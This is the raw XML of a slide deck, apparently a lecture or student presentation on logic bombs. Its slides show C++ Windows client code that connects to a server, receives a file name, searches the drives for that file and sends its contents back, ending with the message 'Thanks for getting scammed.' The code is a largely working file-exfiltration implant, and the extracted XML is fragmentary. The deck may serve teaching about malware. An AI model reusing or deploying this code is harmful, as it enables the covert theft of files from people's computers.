            <a:pPr algn="l"/>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error = connect(server, (struct sockaddr FAR*)&amp;sa, sizeof(sa))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>; //The connect function establishes a connection to a specified socket.</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while (error == SOCKET_ERROR) //continue until connected</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error = connect(server, (struct sockaddr FAR*)&amp;sa, sizeof(sa))</a:t>
            </a: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a:p>
            <a:pPr algn="l"/>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std::cout &lt;&lt; "Connected" &lt;&lt; std::endl;</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//TODO client behavior</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char fileSearch[256];</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for (int i = 0; i &lt; 256; i++)</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fileSearch[i] = 0;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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recv(server, fileSearch, 256, 0);//The recv function receives data from a connected socket or a bound connectionless socket.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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0322917 -0.520278 " pathEditMode="relative" rAng="0" ptsTypes="">
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="29"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="1" y="-2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Client- send the file content to server if found</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114300" y="1076960"/>
            <a:ext cx="11953875" cy="10186670"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	DWORD disk = GetLogicalDrives(); //Retrieves a bitmask representing the currently available disk drives.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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char *filePath = nullptr;</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"Looking for file: " &lt;&lt; fileSearch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for (int i = 1; i &lt; 32; i *= 2)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if ((disk &amp; i) != 0)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std::string startPath;</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startPath += getDiskLetter(i);</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"Looking at disk " &lt;&lt; startPath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startPath +=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filePath = findFile(startPath.c_str(), fileSearch);</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if (filePath != nullptr) //file found</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break;</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lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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if (filePath != nullptr)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"File found"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FILE *fileToSend = fopen(filePath, "rb");</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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if (fileToSend != nullptr)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char buff[4096];</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long sent = 0;</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"Sending..."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while (!feof(fileToSend))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int read;</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if ((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>read = fread(&amp;buff, 1, 4096, fileToSend)) != 0</a:t>
            </a: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r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>sent += send(server, buff, read, 0)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>; //The send function sends data on a connected socket.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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fclose(fileToSend);</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"File sent"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else</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"Error opening file"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else</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"File not found" &lt;&lt; std::endl;</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std::cout &lt;&lt; "Thanks for getting scammed.";</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	return 0;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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776042 0.0512967 L 0.00776042 -0.729253 " pathEditMode="relative" rAng="0" ptsTypes="">
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="29"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-3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itchFamily="34" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4260850" y="2934653"/>
            <a:ext cx="7908925"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lang="en-US" sz="5500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="BF191A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:ea typeface="微软雅黑 Light" charset="-122"/>
                <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="5500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="BF191A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:ea typeface="微软雅黑 Light" charset="-122"/>
                <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ogic Bombs</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="5500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="BF191A"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:ea typeface="微软雅黑 Light"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charset="-122"/>
              <a:cs typeface="+mn-cs"/>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charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>01</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charset="-122"/>
              <a:cs typeface="+mn-cs"/>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charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Part One</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charset="-122"/>
              <a:cs typeface="+mn-cs"/>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Client-find file</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101600" y="1056005"/>
            <a:ext cx="12230735" cy="9239885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1450">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>/*</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this function is to locate a certain file</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char *findFile(const char* path, const char *fileName) {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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HANDLE handleFind;</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WIN32_FIND_DATAA info; //Contains information about the file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std::string pathHelper;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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handleFind = FindFirstFileA(path, &amp;info);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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if (handleFind != INVALID_HANDLE_VALUE)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do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if ((info.cFileName[0] != '.' &amp;&amp; info.cFileName[1] != '\0') &amp;&amp;</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(info.cFileName[0] != '.' &amp;&amp; info.cFileName[1] != '.' &amp;&amp; info.cFileName[2] != '\0'))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if (strcmp(info.cFileName, fileName) == 0 &amp;&amp; info.dwFileAttributes != FILE_ATTRIBUTE_DIRECTORY)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 = path;</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pathHelper.pop_back();</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 += info.cFileName;</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char *file = new char[pathHelper.length()];</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strcpy(file, pathHelper.c_str());</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1450">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>return file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1450">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>; //file found</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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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if (info.dwFileAttributes == FILE_ATTRIBUTE_DIRECTORY)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 = path;</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pathHelper.pop_back();</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 += info.cFileName;</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pathHelper +=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char *filePath = findFile(pathHelper.c_str(), fileName); //if it is a directory</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if (filePath != nullptr)</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return filePath;</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 while (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1450">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>FindNextFileA(handleFind, &amp;info)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1450">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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FindClose(handleFind);</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	return nullptr;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1450">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="145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0833342 L 0 -0.607586 " pathEditMode="relative" rAng="0" ptsTypes="">
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="29"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-3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Client-possible disk driver</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29" name="Text Box 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3691890" y="1081405"/>
            <a:ext cx="4808220" cy="5269230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>char getDiskLetter(int diskNum) { //disk </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switch (diskNum) {</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case 1:</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'A';</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case 2:</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'B';</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case 4:</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'C';</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case 8:</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'D';</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case 16:</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'E';</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case 32:</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'F';</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	return '-';</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="0202060305040502030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微软雅黑"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rPr>
              <a:t>Damages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微软雅黑" pitchFamily="34" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="圆角矩形 22"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2700000">
            <a:off x="3580130" y="1999615"/>
            <a:ext cx="2032000" cy="2032000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="02BBF3"/>
            </a:solid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4" name="圆角矩形 24"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2700000">
            <a:off x="1995805" y="3693795"/>
            <a:ext cx="2032000" cy="2032000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="00D0FF"/>
            </a:solid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5" name="圆角矩形 25"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2700000">
            <a:off x="6668135" y="1999615"/>
            <a:ext cx="2032000" cy="2032000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="0097DB"/>
            </a:solid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7" name="圆角矩形 26"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2700000">
            <a:off x="5092700" y="3693795"/>
            <a:ext cx="2032000" cy="2032000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="01A9E7"/>
            </a:solid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8" name="圆角矩形 27"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2700000">
            <a:off x="8190230" y="3694430"/>
            <a:ext cx="2032000" cy="2032000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="0084CE"/>
            </a:solid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9" name="圆角矩形 28"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2700000">
            <a:off x="1995170" y="3537585"/>
            <a:ext cx="2032000" cy="2032000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00D0FF"/>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0" name="圆角矩形 29"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2700000">
            <a:off x="3579495" y="1843405"/>
            <a:ext cx="2032000" cy="2032000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="02BBF3"/>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1" name="圆角矩形 30"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2700000">
            <a:off x="6667500" y="1843405"/>
            <a:ext cx="2032000" cy="2032000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0097DB"/>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2" name="圆角矩形 31"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2700000">
            <a:off x="8187690" y="3537585"/>
            <a:ext cx="2032000" cy="2032000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0084CE"/>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3" name="圆角矩形 32"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2700000">
            <a:off x="5092065" y="3537585"/>
            <a:ext cx="2032000" cy="2032000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="01A9E7"/>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4" name="圆角矩形 33"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2700000">
            <a:off x="4314190" y="1318260"/>
            <a:ext cx="563245" cy="563245"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 20982"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>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5" name="圆角矩形 34"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId12"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2700000">
            <a:off x="2729865" y="5636260"/>
            <a:ext cx="563245" cy="563245"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 20982"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>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6" name="圆角矩形 35"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId13"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2700000">
            <a:off x="5827395" y="5636260"/>
            <a:ext cx="563245" cy="563245"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 20982"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>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7" name="圆角矩形 44"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId14"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2700000">
            <a:off x="8924925" y="5636260"/>
            <a:ext cx="563245" cy="563245"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 20982"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>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8" name="圆角矩形 45"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId15"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2700000">
            <a:off x="7402830" y="1318260"/>
            <a:ext cx="563245" cy="563245"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 20982"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="29000"/>
              </a:srgb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charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="文本框 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId16"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4342130" y="1438910"/>
            <a:ext cx="508000" cy="322580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" bIns="0" rtlCol="0">
            <a:normAutofit fontScale="80000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" spc="300">
                <a:solidFill>
                  <a:srgbClr val="02BBF3"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="思源黑体 CN Regular" panose="020B0500000000000000" charset="-122"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>02</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" spc="300">
              <a:solidFill>
                <a:srgbClr val="02BBF3"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="思源黑体 CN Regular" panose="020B0500000000000000" charset="-122"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本框 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId17"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2757805" y="5756910"/>
            <a:ext cx="508000" cy="322580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" bIns="0" rtlCol="0">
            <a:normAutofit fontScale="80000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" spc="300">
                <a:solidFill>
                  <a:srgbClr val="00D0FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="思源黑体 CN Regular" panose="020B0500000000000000" charset="-122"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>01</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" spc="300">
              <a:solidFill>
                <a:srgbClr val="00D0FF"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="思源黑体 CN Regular" panose="020B0500000000000000" charset="-122"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId18"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5855335" y="5756910"/>
            <a:ext cx="508000" cy="322580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" bIns="0" rtlCol="0">
            <a:normAutofit fontScale="80000" lnSpcReduction="10000"/>
